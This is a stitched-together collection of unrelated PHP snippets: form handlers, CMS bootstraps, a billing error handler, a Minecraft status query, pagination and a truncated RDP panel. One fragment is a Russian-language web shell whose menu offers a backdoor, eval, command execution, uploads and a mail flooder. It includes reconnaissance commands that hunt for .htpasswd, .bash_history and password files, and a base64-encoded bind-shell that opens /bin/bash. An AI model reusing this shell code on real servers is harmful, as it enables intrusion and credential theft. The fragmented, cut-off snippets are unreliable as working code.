public static function main() { Error_Reporting(E_ALL & ~E_NOTICE); session_start(); /*сверяем антиспам код полученный из формы с кодом, записанным в сессии клиента*/ self::asp_check(); /*обрабатываем данные, полученные от клиента (с формы на сайте)*/ if (self::$errCount === 0) { self::form_data_validation(); } else { /*формируем ajax-ответ и отправляем его клиенту*/ self::response_send(); // передаем клиенту код ошибки и инициируем обновление ASP /*очищаем контекст текущего сеанса*/ self::obj_and_sess_destroy(); } //если критических ошибок нет, то if (self::$errCount === 0) { //пишем данные в архивный файл на сервере self::form_data_save_to_file(); //создаем сообщение и отправляем его на заданный в конфигурации адрес эл.почты self::mail_create_and_send(); /*формируем ajax-ответ и отправляем его клиенту*/ self::response_send(); // передаем клиенту сообщение об удачной отправке данных, частично обнуляем форму и инициируем обновление ASP /*Уничтожаем все объекты и текущую сессию*/ self::obj_and_sess_destroy(); } else { /*формируем ajax-ответ и отправляем его клиенту*/ self::response_send(); // передаем клиенту код ошибки и инициируем обновление ASP self::obj_and_sess_destroy(); } }
function PHPlot_Data() { Error_Reporting(0); //Otherwise PHP complains $this->img not defined. if ($this->img == "") { $this->PHPlot(); } }
<?php Error_Reporting(E_ALL & ~E_NOTICE); unset($l); session_start(); session_register($l); if (!isset($l)) { header("Location: ../../login.php"); exit; } ?> <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1251"> <title>»гровой автомат 3 туза.</title> <script language="JavaScript" type="text/javascript"> <!-- window.status="»гровой автомат 3 туза."; //--> </script> </HEAD> <BODY bgcolor="#0B2A40" leftmargin="0" marginwidth="0" marginheight="0" topmargin="0"> <center> <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" WIDTH="100%" HEIGHT="100%" id="index">
<?php /******************************************************************************/ /********************************CMS.VADYUS.COM********************************/ /******************************************************************************/ Error_Reporting(E_ALL & ~E_NOTICE & ~E_WARNING); header('Content-Type: text/html; charset=utf-8'); session_start(); define("VALID_CMS", 1); define('PATH', $_SERVER['DOCUMENT_ROOT']); include PATH . '/core/cms.php'; cmsCore::getInstance(); cmsCore::loadClass('page'); cmsCore::loadClass('user'); $inUser = cmsUser::getInstance(); if (!$inUser->update() || $inUser->id) { cmsCore::halt(); } if (cmsConfig::getConfig('siteoff') && !$inUser->is_admin) { cmsCore::halt(); } cmsCore::callEvent('LOGINZA_AUTH', array()); cmsCore::halt();
<?php #------------------------------------------------------------------------------- /** @author Бреславский А.В. (Joonte Ltd.) */ #------------------------------------------------------------------------------- Error_Reporting(E_ALL); #------------------------------------------------------------------------------- echo <<<EOD Joonte Software Company 2007-2010 JBs database install programm EOD; #------------------------------------------------------------------------------- # Using: # %1 - JBs host # %2 - database user name # %3 - database name # %4 - database user password # %5 - database server # %6 - database port # Example: # php db-install.php root root jbs #------------------------------------------------------------------------------- $jHost = @$argv[1]; #------------------------------------------------------------------------------- if (!$jHost) { exit("JBs host is empty\n"); } #------------------------------------------------------------------------------- $dUser = @$argv[2]; #------------------------------------------------------------------------------- if (!$dUser) {
<?php define('MQ_SERVER_ADDR1', 'mc.cyanideservices.net'); define('MQ_SERVER_PORT1', 25565); define('MQ_SERVER_ADDR2', 'mc.cyanideservices.net'); define('MQ_SERVER_PORT2', 25565); define('MQ_SERVER_ADDR3', 'mc.cyanideservices.net'); define('MQ_SERVER_PORT3', 25565); define('MQ_SERVER_ADDR4', 'mc.cyanideservices.net'); define('MQ_SERVER_PORT4', 25565); define('MQ_SERVER_ADDR5', 'mc.cyanideservices.net'); define('MQ_SERVER_PORT5', 25565); define('MQ_SERVER_ADDR6', 'mc.cyanideservices.net'); define('MQ_SERVER_PORT6', 25565); define('MQ_TIMEOUT', 1); Error_Reporting(E_ALL | E_STRICT); Ini_Set('display_errors', true); require __DIR__ . '/php/MinecraftQuery.class.php'; $Timer = MicroTime(true); $Query1 = new MinecraftQuery(); try { $Query1->Connect(MQ_SERVER_ADDR1, MQ_SERVER_PORT1, MQ_TIMEOUT); } catch (MinecraftQueryException $e) { $Exception = $e; } $Timer = Number_Format(MicroTime(true) - $Timer, 4, '.', ''); $Query2 = new MinecraftQuery(); try { $Query2->Connect(MQ_SERVER_ADDR2, MQ_SERVER_PORT2, MQ_TIMEOUT); } catch (MinecraftQueryException $e) { $Exception = $e;
function __Error_Handler__($Number, $Error, $File, $Line) { #------------------------------------------------------------------------------- $Message = SPrintF('[!!%s]-%s в линии %s файла %s', $Number, $Error, $Line, $File); #------------------------------------------------------------------------------- $__ERR_CODE =& $GLOBALS['__ERR_CODE']; #------------------------------------------------------------------------------- if ((int) $Error && $__ERR_CODE == 100) { $__ERR_CODE = $Error; } #------------------------------------------------------------------------------- Debug(SPrintF('[!] %s', $Message)); //Debug(SPrintF('[!] %s',debug_print_backtrace())); #------------------------------------------------------------------------------- //Error_Reporting(E_ALL); #------------------------------------------------------------------------------- if (Error_Reporting()) { #------------------------------------------------------------------------------- $JBsErrorID = SPrintF('%s[%s]', HOST_ID, Md5(Implode(':', array($Number, $Error, $Line, $File)))); #------------------------------------------------------------------------------- $__SYSLOG =& $GLOBALS['__SYSLOG']; #------------------------------------------------------------------------------- $Log = Implode("\n", $__SYSLOG); #------------------------------------------------------------------------------- Report($JBsErrorID, $JBsErrorID); #------------------------------------------------------------------------------- foreach (array(SYSTEM_PATH, '/tmp') as $Folder) { #------------------------------------------------------------------------------- $Path = SPrintF('%s/jbs-errors.log', $Folder); #------------------------------------------------------------------------------- if (File_Exists($Path)) { if (FileSize($Path) > 1024 * 1024) { UnLink($Path); } } #------------------------------------------------------------------------------- umask(077); #------------------------------------------------------------------------------- if (!@File_Put_Contents($Path, SPrintF("%s\n\n%s\n\n", $JBsErrorID, $Log), FILE_APPEND)) { #------------------------------------------------------------------------------- Debug(SPrintF('[__Error_Handler__]: не удалось осуществить запись ошибки в системный лог (%s)', $Path)); #------------------------------------------------------------------------------- continue; #------------------------------------------------------------------------------- } #------------------------------------------------------------------------------- break; #------------------------------------------------------------------------------- } #------------------------------------------------------------------------------- if (File_Exists(SPrintF('%s/DEBUG.OUT', SYSTEM_PATH)) || !isset($_SERVER["REMOTE_PORT"])) { #------------------------------------------------------------------------------- exit($Log); } else { #------------------------------------------------------------------------------- $Errors = array(100 => 'Ошибка выполнения', 101 => 'Неизвестный результат', 201 => 'Неверные параметры', 400 => 'Ошибка данных', 500 => 'Системная ошибка', 600 => 'Ошибка политики безопасности', 601 => 'Неверный реферер', 602 => 'Отсутствует реферер', 603 => 'Неверный ключ CSRF', 700 => 'Нарушение политики прав'); #------------------------------------------------------------------------------- $FilePath = SPrintF('%s/hosts/root/templates/modules/Trigger.Error.html', SYSTEM_PATH); #------------------------------------------------------------------------------- if (Is_Readable($FilePath)) { #------------------------------------------------------------------------------- $Result = @File_Get_Contents($FilePath); #------------------------------------------------------------------------------- } else { #------------------------------------------------------------------------------- $Result = SPrintF("Cannot read error file: %s<BR />\nError: %%s<BR />\n<!--%%s-->\nErrorID: %%s\n<!--%%s-->", $FilePath); #------------------------------------------------------------------------------- } #------------------------------------------------------------------------------- $String = SPrintF('%s (%s)', $Errors[$__ERR_CODE], $__ERR_CODE); #------------------------------------------------------------------------------- @Header(SPrintF('JBs-ErrorID: %s', $JBsErrorID)); #------------------------------------------------------------------------------- if (isset($_POST['XMLHttpRequest'])) { #------------------------------------------------------------------------------- $Answer = array('Error' => array('CodeID' => $__ERR_CODE, 'String' => $String), 'Status' => 'Error'); #------------------------------------------------------------------------------- exit(JSON_Encode($Answer)); #------------------------------------------------------------------------------- } else { #------------------------------------------------------------------------------- exit(SPrintF($Result, $String, $String, $JBsErrorID, Date('Y', Time()))); #------------------------------------------------------------------------------- } #------------------------------------------------------------------------------- } #------------------------------------------------------------------------------- } #------------------------------------------------------------------------------- }
<?php /** * Файл index.php расположен в корне CMS, является единственной точкой инициализирующей работу системы. * * В этом файле: * - настраивается вывод ошибок; * - устанавлюиваются константы для работы движка; * - массивом $includePath задаются пути для поиска библиотек при подключении файлов движка. * * @author Авдеев Марк <*****@*****.**> * @package moguta.cms * @subpackage Files */ //Не выводить предупреждения и ошибки. Error_Reporting(0); // Установка кодировки для вывода контента. header('Content-Type: text/html; charset=utf-8'); /** * Путь корневой директории сайта. */ define('SITE_DIR', $_SERVER['DOCUMENT_ROOT'] . '/'); /** * Путь к директории ядра. */ define('CORE_DIR', 'mg-core/'); /** * Путь к директории с библиотеками движка. */ define('CORE_LIB', CORE_DIR . 'lib/'); /**
function printPages($total, $pagenum, $url) { // Проверяем нужны ли стрелки назад if ($pagenum != 1) { $pervpage = '<a href="' . $url . '1">Первая</a> | <a href="' . $url . ($pagenum - 1) . '">Предыдущая</a> | '; } // Проверяем нужны ли стрелки вперед if ($pagenum != $total) { $nextpage = ' | <a href="' . $url . ($pagenum + 1) . '">Следующая</a> | <a href="' . $url . $total . '">Последняя</a>'; } // Находим две ближайшие станицы с обоих краев, если они есть if ($pagenum - 5 > 0) { $pagenum5left = ' <a href="' . $url . ($pagenum - 5) . '">' . ($pagenum - 5) . '</a> | '; } if ($pagenum - 4 > 0) { $pagenum4left = ' <a href="' . $url . ($pagenum - 4) . '">' . ($pagenum - 4) . '</a> | '; } if ($pagenum - 3 > 0) { $pagenum3left = ' <a href="' . $url . ($pagenum - 3) . '">' . ($pagenum - 3) . '</a> | '; } if ($pagenum - 2 > 0) { $pagenum2left = ' <a href="' . $url . ($pagenum - 2) . '">' . ($pagenum - 2) . '</a> | '; } if ($pagenum - 1 > 0) { $pagenum1left = ' <a href="' . $url . ($pagenum - 1) . '">' . ($pagenum - 1) . '</a> | '; } if ($pagenum + 5 <= $total) { $pagenum5right = ' | <a href="' . $url . ($pagenum + 5) . '">' . ($pagenum + 5) . '</a>'; } if ($pagenum + 4 <= $total) { $pagenum4right = ' | <a href="' . $url . ($pagenum + 4) . '">' . ($pagenum + 4) . '</a>'; } if ($pagenum + 3 <= $total) { $pagenum3right = ' | <a href="' . $url . ($pagenum + 3) . '">' . ($pagenum + 3) . '</a>'; } if ($pagenum + 2 <= $total) { $pagenum2right = ' | <a href="' . $url . ($pagenum + 2) . '">' . ($pagenum + 2) . '</a>'; } if ($pagenum + 1 <= $total) { $pagenum1right = ' | <a href="' . $url . ($pagenum + 1) . '">' . ($pagenum + 1) . '</a>'; } // Вывод меню если страниц больше одной if ($total > 1) { Error_Reporting(E_ALL & ~E_NOTICE); echo "<div class='pstrnav'>"; echo "<p>" . $pervpage . $pagenum5left . $pagenum4left . $pagenum3left . $pagenum2left . $pagenum1left . $pagenum . $pagenum1right . $pagenum2right . $pagenum3right . $pagenum4right . $pagenum5right . $nextpage . "</p>"; echo "</div>"; } }
бекдора</A> ][ <A href="?ac=eval" title='Создай свой скрипт на php прямо здесь :)'>PHP-код</A> ][ <A href="?ac=upload" title='Загрузка одного файла, масcовая загрузка, загрузка файлов с удаленного компьютера!'>Загрузка файлов</A> ][ <A href="?ac=shell" title='bash shell, альясы...'>Исполнение команд ]</A> <br><A href="?ac=sql" title='Работа с MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Отправь е-mail отсюда!'>[ Отправка письма</A> ][ <A href="?ac=mailfluder" title='Тебя кто-то достал? Тогда тебе сюда...'>Маилфлудер</A> ][ <A href="?ac=tools" title='Кодировщики/декодировщики md5, des, sha1, base64... '>Инструменты ]</A>[ <A href="?ac=ps" title='Отображает список процессов на сервере и позволяет их убивать!'>Демоны</A> ][ <A href="?ac=art" title='Альтернативные методы взлома...'>Альтернативные методы</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Надоел этот сервер? Тогда можно удалить и шелл...'>Удалить шелл</A> ]</P> <?php if (ini_get('register_globals') != '1') { if (!empty($HTTP_POST_VARS)) { extract($HTTP_POST_VARS); } if (!empty($HTTP_GET_VARS)) { extract($HTTP_GET_VARS); } if (!empty($HTTP_SERVER_VARS)) { extract($HTTP_SERVER_VARS); } } Error_Reporting(E_COMPILE_ERROR | E_ERROR | E_CORE_ERROR); set_magic_quotes_runtime(0); set_time_limit(0); // убрать ограничение по времени ignore_user_abort(1); // игнорировать разрыв связи с браузером error_reporting(0); $self = $_SERVER['PHP_SELF']; $docr = $_SERVER['DOCUMENT_ROOT']; $sern = $_SERVER['SERVER_NAME']; if ($_POST['dir'] !== "" and $_POST['dir']) { chdir($_POST['dir']); } $aliases = array('------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a', 'поиск на сервере всех файлов со suid-битом' => 'find / -type f -perm -04000 -ls', 'поиск на сервере всех файлов со sgid-битом' => 'find / -type f -perm -02000 -ls', 'поиск в текущей директории всех файлов со sgid-битом' => 'find . -type f -perm -02000 -ls', 'поиск на сервере файлов config' => 'find / -type f -name "config*"', 'поиск на сервере файлов admin' => 'find / -type f -name "admin*"', 'поиск в текущей директории файлов config' => 'find . -type f -name "config*"', 'поиск в текущей директории файлов pass' => 'find . -type f -name "pass*"', 'поиск на сервере всех директорий и файлов, открытых для записи' => 'find / -perm -2 -ls', 'поиск в текущей директории всех директорий и файлов, открытых для записи' => 'find . -perm -2 -ls', 'поиск в текущей директории файлов service.pwd' => 'find . -type f -name service.pwd', 'поиск на сервере файлов service.pwd' => 'find / -type f -name service.pwd', 'поиск на сервере файлов .htpasswd' => 'find / -type f -name .htpasswd', 'поиск в текущей директории файлов .htpasswd' => 'find . -type f -name .htpasswd', 'поиск всех файлов .bash_history' => 'find / -type f -name .bash_history', 'поиск в текущей директории файлов .bash_history' => 'find . -type f -name .bash_history', 'поиск всех файлов .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'поиск в текущей директории файлов .fetchmailrc' => 'find . -type f -name .fetchmailrc', 'вывод списка атрибутов файлов на файловой системе ext2fs' => 'lsattr -va', 'просмотр открытых портов' => 'netstat -an | grep -i listen', 'поиск всех php-файлов со словом password' => 'find / -name *.php | xargs grep -li password', 'поиск папок с модом 777' => 'find / -type d -perm 0777', 'Определение версии ОС' => 'sysctl -a | grep version', 'Определение версии ядра' => 'cat /proc/version', 'Просмотр syslog.conf' => 'cat /etc/syslog.conf', 'Просмотр Message of the day' => 'cat /etc/motd', 'Просмотр hosts' => 'cat /etc/hosts', 'Версия дистрибутива 1' => 'cat /etc/issue.net', 'Версия дистрибутива 2' => 'cat /etc/*-realise', 'Показать все процесы' => 'ps auxw', 'Процессы текущего пользователя' => 'ps ux', 'Поиск httpd.conf' => 'locate httpd.conf'); /* Port bind source */ $port_bind_bd_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5\r\njbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5\r\nldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5\r\n0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV\r\nmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0\r\nKIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh\r\nhdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F\r\nOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N\r\nrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F\r\nkZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB\r\n7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV\r\nwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ\r\n6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh\r\nhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J\r\npbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN\r\nsb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5\r\n0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih\r\nlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0\r\n9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk\r\npDQpyZXR1cm4gMDsNCn0=";
<?php include_once "../common.php"; include_once ROOT_PATH . "/mod/functs.php"; if (!$user->Check()) { exit; } Error_Reporting(E_ERROR | E_PARSE); $icfg = $db->GetConfigs(); $host = $icfg['rdp_host']; $user = $icfg['rdp_user']; $password = $icfg['rdp_password']; $db_ = $icfg['rdp_db']; $table = $icfg['rdp_table']; $smarty->assign('HOST', $icfg['rdp_server_ip']); $db2 = new mysqli($host, $user, $password, $db_); if (!is_object($db2) || !$db2->ping()) { die("<font class='error'>Connect failed</font> : " . $db2->connect_error . "<br>{$host}:{$user}:{$password}:{$db_}"); } $sql = "SELECT uid, port_out, dwWidth, dwHeigth, dwDepth FROM {$table}"; $rs = $db2->query($sql); if (@$rs) { if ($db2->affected_rows) { $RES = array(); for ($i = 0; list($guid, $port, $w, $h, $d) = $rs->fetch_row(); $i++) { $RES[] = array('I' => $i, 'GUID' => $guid, 'HOST' => $icfg['rdp_server_ip'], 'PORT' => $port, 'w' => $w, 'h' => $h, 'd' => $d); } $smarty->assign('CONT_ARR', $RES); } } else { die("<font class='error>ERROR</font> : Table is not exists ? ( {$sql} )");